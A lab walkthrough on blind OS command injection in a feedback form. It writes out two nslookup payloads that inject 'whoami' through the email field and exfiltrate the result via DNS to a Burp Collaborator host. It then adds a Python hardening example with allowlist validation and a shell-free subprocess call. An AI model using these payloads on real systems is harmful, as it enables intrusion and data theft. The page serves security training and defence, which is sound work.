This lab contains a blind OS command injection vulnerability in the feedback function.
⚙️ The command runs asynchronously and produces no output in the response.
🚫 You cannot redirect the output to a file or readable location.
✅ But you can exfiltrate command output using DNS queries to an external domain (Burp Collaborator).
Execute the whoami command on the server and exfiltrate its output via a DNS request to Burp Collaborator.
You’ll need to capture the username from the DNS query to complete the lab.
You want the server to execute the whoami command, then send its output as a subdomain in a DNS request.
🧬 Use one of the following payloads in the email field:
$email = || nslookup `whoami` BurpCollaborator ||
or use this command
$email = || nslookup $(whoami) BurpCollaborator ||
✅ Backticks (`...`) and $(...) are both shell command substitution: the shell runs the enclosed command and passes its output to nslookup as an argument.
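From the defender's side, the substitution only happens because the email value reaches a shell. The following is an added example, not part of the lab or its server code: it validates the field against a strict allowlist and passes it to a child process as a single argv element, so `||`, backticks and `$(...)` stay literal text. The handler name `submit_feedback` and the Python child process standing in for the real mail helper are assumptions.

```python
import re
import subprocess
import sys

# Strict allowlist: no spaces, pipes, backticks, '$' or parentheses can match,
# and a leading '-' is refused so the value cannot be read as an option.
EMAIL_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Constructed sample inputs: one benign address and the two payloads from this page.
SAMPLES = [
    "user@example.com",
    "|| nslookup `whoami` BurpCollaborator ||",
    "|| nslookup $(whoami) BurpCollaborator ||",
]


def is_safe_email(value: str) -> bool:
    """Return True only for values that match the allowlist in full."""
    return len(value) <= 254 and EMAIL_RE.fullmatch(value) is not None


def echo_via_argv(value: str) -> str:
    """Pass value to a child process as one argv element, with no shell.

    The child (a stand-in for the real mail helper) writes back exactly what
    it received, so the caller can see that nothing was expanded or split.
    """
    child = "import sys; sys.stdout.write(sys.argv[1])"
    result = subprocess.run(
        [sys.executable, "-c", child, value],  # list form means shell=False
        capture_output=True, text=True, check=True, timeout=10,
    )
    return result.stdout


def submit_feedback(email: str, message: str) -> str:
    """Hypothetical hardened handler: validate first, then call without a shell."""
    if not is_safe_email(email):
        raise ValueError("invalid email address")
    return echo_via_argv(f"{email}: {message}")


if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r}: allowed={is_safe_email(sample)}, "
              f"argv received={echo_via_argv(sample)!r}")
```

Either control alone blocks the payloads above; using both means a later change to the validation pattern does not reopen the injection.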

